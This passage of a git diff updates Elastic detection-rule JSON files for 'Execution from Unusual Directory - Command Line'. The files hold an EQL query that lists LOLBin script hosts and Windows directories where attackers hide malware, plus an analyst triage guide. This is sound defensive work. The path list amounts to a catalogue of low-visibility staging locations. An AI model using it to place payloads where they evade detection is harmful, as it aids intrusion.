further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Execution from Unusual Directory - Command Line\n\nThis rule looks for the execution of scripts from unusual directories. Attackers can use system or application paths to hide malware and make the execution less suspicious.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of parent process executable and command line conditions.\n\n### Related rules\n\n- Process Execution from an Unusual Directory - ebfe1448-7fac-4d59-acea-181bd89b1f7f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"wscript.exe\",\n \"cscript.exe\",\n \"rundll32.exe\",\n \"regsvr32.exe\",\n \"cmstp.exe\",\n \"RegAsm.exe\",\n \"installutil.exe\",\n \"mshta.exe\",\n \"RegSvcs.exe\",\n \"powershell.exe\",\n \"pwsh.exe\",\n \"cmd.exe\") and\n\n /* add suspicious execution paths here */\n process.args : (\"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\Users\\\\Public\\\\*\",\n \"C:\\\\Windows\\\\Tasks\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\AMD\\\\Temp\\\\*\",\n \"C:\\\\Windows\\\\AppReadiness\\\\*\",\n \"C:\\\\Windows\\\\ServiceState\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"C:\\\\Windows\\\\Branding\\\\*\",\n \"C:\\\\Windows\\\\csc\\\\*\",\n \"C:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"C:\\\\Windows\\\\en-US\\\\*\",\n \"C:\\\\Windows\\\\wlansvc\\\\*\",\n \"C:\\\\Windows\\\\Prefetch\\\\*\",\n \"C:\\\\Windows\\\\Fonts\\\\*\",\n \"C:\\\\Windows\\\\diagnostics\\\\*\",\n \"C:\\\\Windows\\\\TAPI\\\\*\",\n \"C:\\\\Windows\\\\INF\\\\*\",\n \"C:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"C:\\\\windows\\\\tracing\\\\*\",\n \"c:\\\\windows\\\\IME\\\\*\",\n \"c:\\\\Windows\\\\Performance\\\\*\",\n \"c:\\\\windows\\\\intel\\\\*\",\n \"c:\\\\windows\\\\ms\\\\*\",\n \"C:\\\\Windows\\\\dot3svc\\\\*\",\n \"C:\\\\Windows\\\\panther\\\\*\",\n \"C:\\\\Windows\\\\RemotePackages\\\\*\",\n \"C:\\\\Windows\\\\OCR\\\\*\",\n \"C:\\\\Windows\\\\appcompat\\\\*\",\n \"C:\\\\Windows\\\\apppatch\\\\*\",\n \"C:\\\\Windows\\\\addins\\\\*\",\n \"C:\\\\Windows\\\\Setup\\\\*\",\n \"C:\\\\Windows\\\\Help\\\\*\",\n \"C:\\\\Windows\\\\SKB\\\\*\",\n \"C:\\\\Windows\\\\Vss\\\\*\",\n \"C:\\\\Windows\\\\servicing\\\\*\",\n \"C:\\\\Windows\\\\CbsTemp\\\\*\",\n \"C:\\\\Windows\\\\Logs\\\\*\",\n \"C:\\\\Windows\\\\WaaS\\\\*\",\n \"C:\\\\Windows\\\\twain_32\\\\*\",\n \"C:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"C:\\\\Windows\\\\ShellComponents\\\\*\",\n \"C:\\\\Windows\\\\PLA\\\\*\",\n \"C:\\\\Windows\\\\Migration\\\\*\",\n \"C:\\\\Windows\\\\debug\\\\*\",\n \"C:\\\\Windows\\\\Cursors\\\\*\",\n \"C:\\\\Windows\\\\Containers\\\\*\",\n \"C:\\\\Windows\\\\Boot\\\\*\",\n \"C:\\\\Windows\\\\bcastdvr\\\\*\",\n \"C:\\\\Windows\\\\TextInput\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\schemas\\\\*\",\n \"C:\\\\Windows\\\\SchCache\\\\*\",\n \"C:\\\\Windows\\\\Resources\\\\*\",\n \"C:\\\\Windows\\\\rescache\\\\*\",\n \"C:\\\\Windows\\\\Provisioning\\\\*\",\n \"C:\\\\Windows\\\\PrintDialog\\\\*\",\n \"C:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"C:\\\\Windows\\\\media\\\\*\",\n \"C:\\\\Windows\\\\Globalization\\\\*\",\n \"C:\\\\Windows\\\\L2Schemas\\\\*\",\n \"C:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"C:\\\\Windows\\\\ModemLogs\\\\*\",\n \"C:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"C:\\\\$Recycle.Bin\\\\*\") and\n\n /* noisy FP patterns */\n\n not process.parent.executable : (\"C:\\\\WINDOWS\\\\System32\\\\DriverStore\\\\FileRepository\\\\*\\\\igfxCUIService*.exe\",\n \"C:\\\\Windows\\\\System32\\\\spacedeskService.exe\",\n \"C:\\\\Program Files\\\\Dell\\\\SupportAssistAgent\\\\SRE\\\\SRE.exe\") and\n not (process.name : \"rundll32.exe\" and\n process.args : (\"uxtheme.dll,#64\",\n \"PRINTUI.DLL,PrintUIEntry\",\n \"?:\\\\Windows\\\\System32\\\\FirewallControlPanel.dll,ShowNotificationDialog\",\n \"?:\\\\WINDOWS\\\\system32\\\\Speech\\\\SpeechUX\\\\sapi.cpl\",\n \"?:\\\\Windows\\\\system32\\\\shell32.dll,OpenAs_RunDLL\")) and\n\n not (process.name : \"cscript.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\calluxxprovider.vbs\") and\n\n not (process.name : \"cmd.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\powercfg.exe\" and process.args : \"?:\\\\WINDOWS\\\\inf\\\\PowerPlan.log\") and\n\n not (process.name : \"regsvr32.exe\" and process.args : \"?:\\\\Windows\\\\Help\\\\OEM\\\\scripts\\\\checkmui.dll\") and\n\n not (process.name : \"cmd.exe\" and\n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\oobe\\\\windeploy.exe\",\n \"?:\\\\Program Files (x86)\\\\ossec-agent\\\\wazuh-agent.exe\",\n \"?:\\\\Windows\\\\System32\\\\igfxCUIService.exe\",\n \"?:\\\\Windows\\\\Temp\\\\IE*.tmp\\\\IE*-support\\\\ienrcore.exe\"))\n", "related_integrations": [ { @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "cff92c41-2225-4763-b4ce-6f71e5bda5e6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -91,7 +91,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_107.json b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_107.json index 64f64fbe14c..4817a65e862 100644 --- a/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_107.json +++ b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_107.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Execution from Unusual Directory - Command Line", - "note": "## Triage and analysis\n\n### Investigating Execution from Unusual Directory - Command Line\n\nThis rule looks for the execution of scripts from unusual directories. Attackers can use system or application paths to hide malware and make the execution less suspicious.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of parent process executable and command line conditions.\n\n### Related rules\n\n- Process Execution from an Unusual Directory - ebfe1448-7fac-4d59-acea-181bd89b1f7f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Execution from Unusual Directory - Command Line\n\nThis rule looks for the execution of scripts from unusual directories. Attackers can use system or application paths to hide malware and make the execution less suspicious.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of parent process executable and command line conditions.\n\n### Related rules\n\n- Process Execution from an Unusual Directory - ebfe1448-7fac-4d59-acea-181bd89b1f7f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"wscript.exe\",\n \"cscript.exe\",\n \"rundll32.exe\",\n \"regsvr32.exe\",\n \"cmstp.exe\",\n \"RegAsm.exe\",\n \"installutil.exe\",\n \"mshta.exe\",\n \"RegSvcs.exe\",\n \"powershell.exe\",\n \"pwsh.exe\",\n \"cmd.exe\") and\n\n /* add suspicious execution paths here */\n process.args : (\"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\Users\\\\Public\\\\*\",\n \"C:\\\\Windows\\\\Tasks\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\AMD\\\\Temp\\\\*\",\n \"C:\\\\Windows\\\\AppReadiness\\\\*\",\n \"C:\\\\Windows\\\\ServiceState\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\IdentityCRL\\\\*\",\n \"C:\\\\Windows\\\\Branding\\\\*\",\n \"C:\\\\Windows\\\\csc\\\\*\",\n \"C:\\\\Windows\\\\DigitalLocker\\\\*\",\n \"C:\\\\Windows\\\\en-US\\\\*\",\n \"C:\\\\Windows\\\\wlansvc\\\\*\",\n \"C:\\\\Windows\\\\Prefetch\\\\*\",\n \"C:\\\\Windows\\\\Fonts\\\\*\",\n \"C:\\\\Windows\\\\diagnostics\\\\*\",\n \"C:\\\\Windows\\\\TAPI\\\\*\",\n \"C:\\\\Windows\\\\INF\\\\*\",\n \"C:\\\\Windows\\\\System32\\\\Speech\\\\*\",\n \"C:\\\\windows\\\\tracing\\\\*\",\n \"c:\\\\windows\\\\IME\\\\*\",\n \"c:\\\\Windows\\\\Performance\\\\*\",\n \"c:\\\\windows\\\\intel\\\\*\",\n \"c:\\\\windows\\\\ms\\\\*\",\n \"C:\\\\Windows\\\\dot3svc\\\\*\",\n \"C:\\\\Windows\\\\panther\\\\*\",\n \"C:\\\\Windows\\\\RemotePackages\\\\*\",\n \"C:\\\\Windows\\\\OCR\\\\*\",\n \"C:\\\\Windows\\\\appcompat\\\\*\",\n \"C:\\\\Windows\\\\apppatch\\\\*\",\n \"C:\\\\Windows\\\\addins\\\\*\",\n \"C:\\\\Windows\\\\Setup\\\\*\",\n \"C:\\\\Windows\\\\Help\\\\*\",\n \"C:\\\\Windows\\\\SKB\\\\*\",\n \"C:\\\\Windows\\\\Vss\\\\*\",\n \"C:\\\\Windows\\\\servicing\\\\*\",\n \"C:\\\\Windows\\\\CbsTemp\\\\*\",\n \"C:\\\\Windows\\\\Logs\\\\*\",\n \"C:\\\\Windows\\\\WaaS\\\\*\",\n \"C:\\\\Windows\\\\twain_32\\\\*\",\n \"C:\\\\Windows\\\\ShellExperiences\\\\*\",\n \"C:\\\\Windows\\\\ShellComponents\\\\*\",\n \"C:\\\\Windows\\\\PLA\\\\*\",\n \"C:\\\\Windows\\\\Migration\\\\*\",\n \"C:\\\\Windows\\\\debug\\\\*\",\n \"C:\\\\Windows\\\\Cursors\\\\*\",\n \"C:\\\\Windows\\\\Containers\\\\*\",\n \"C:\\\\Windows\\\\Boot\\\\*\",\n \"C:\\\\Windows\\\\bcastdvr\\\\*\",\n \"C:\\\\Windows\\\\TextInput\\\\*\",\n \"C:\\\\Windows\\\\security\\\\*\",\n \"C:\\\\Windows\\\\schemas\\\\*\",\n \"C:\\\\Windows\\\\SchCache\\\\*\",\n \"C:\\\\Windows\\\\Resources\\\\*\",\n \"C:\\\\Windows\\\\rescache\\\\*\",\n \"C:\\\\Windows\\\\Provisioning\\\\*\",\n \"C:\\\\Windows\\\\PrintDialog\\\\*\",\n \"C:\\\\Windows\\\\PolicyDefinitions\\\\*\",\n \"C:\\\\Windows\\\\media\\\\*\",\n \"C:\\\\Windows\\\\Globalization\\\\*\",\n \"C:\\\\Windows\\\\L2Schemas\\\\*\",\n \"C:\\\\Windows\\\\LiveKernelReports\\\\*\",\n \"C:\\\\Windows\\\\ModemLogs\\\\*\",\n \"C:\\\\Windows\\\\ImmersiveControlPanel\\\\*\",\n \"C:\\\\$Recycle.Bin\\\\*\") and\n\n /* noisy FP patterns */\n\n not process.parent.executable : (\"C:\\\\WINDOWS\\\\System32\\\\DriverStore\\\\FileRepository\\\\*\\\\igfxCUIService*.exe\",\n \"C:\\\\Windows\\\\System32\\\\spacedeskService.exe\",\n \"C:\\\\Program Files\\\\Dell\\\\SupportAssistAgent\\\\SRE\\\\SRE.exe\") and\n not (process.name : \"rundll32.exe\" and\n process.args : (\"uxtheme.dll,#64\",\n \"PRINTUI.DLL,PrintUIEntry\",\n \"?:\\\\Windows\\\\System32\\\\FirewallControlPanel.dll,ShowNotificationDialog\",\n \"?:\\\\WINDOWS\\\\system32\\\\Speech\\\\SpeechUX\\\\sapi.cpl\",\n \"?:\\\\Windows\\\\system32\\\\shell32.dll,OpenAs_RunDLL\")) and\n\n not (process.name : \"cscript.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\calluxxprovider.vbs\") and\n\n not (process.name : \"cmd.exe\" and process.args : \"?:\\\\WINDOWS\\\\system32\\\\powercfg.exe\" and process.args : \"?:\\\\WINDOWS\\\\inf\\\\PowerPlan.log\") and\n\n not (process.name : \"regsvr32.exe\" and process.args : \"?:\\\\Windows\\\\Help\\\\OEM\\\\scripts\\\\checkmui.dll\") and\n\n not (process.name : \"cmd.exe\" and\n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\oobe\\\\windeploy.exe\",\n \"?:\\\\Program Files (x86)\\\\ossec-agent\\\\wazuh-agent.exe\",\n \"?:\\\\Windows\\\\System32\\\\igfxCUIService.exe\",\n \"?:\\\\Windows\\\\Temp\\\\IE*.tmp\\\\IE*-support\\\\ienrcore.exe\"))\n", "related_integrations": [ { @@ -55,7 +55,7 @@ ], "risk_score": 47, "rule_id": "cff92c41-2225-4763-b4ce-6f71e5bda5e6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_108.json b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_108.json index bfa05b10999..e63afb1b104 100644 --- a/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_108.json +++ b/packages/security_detection_engine/kibana/security_rule/cff92c41-2225-4763-b4ce-6f71e5bda5e6_108.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Execution from Unusual Directory - Command Line", - "note": "## Triage and analysis\n\n### Investigating Execution from Unusual Directory - Command Line\n\nThis rule looks for the execution of scripts from unusual directories. Attackers can use system or application paths to hide malware and make the execution less suspicious.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of parent process executable and command line conditions.\n\n### Related rules\n\n- Process Execution from an Unusual Directory - ebfe1448-7fac-4d59-acea-181bd89b1f7f\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Execution from Unusual Directory - Command Line\n\nThis rule looks for the execution of scripts from unusual directories. Attackers can use system or application paths to hide malware and make the execution less suspicious.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to determine which commands or scripts were executed.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, 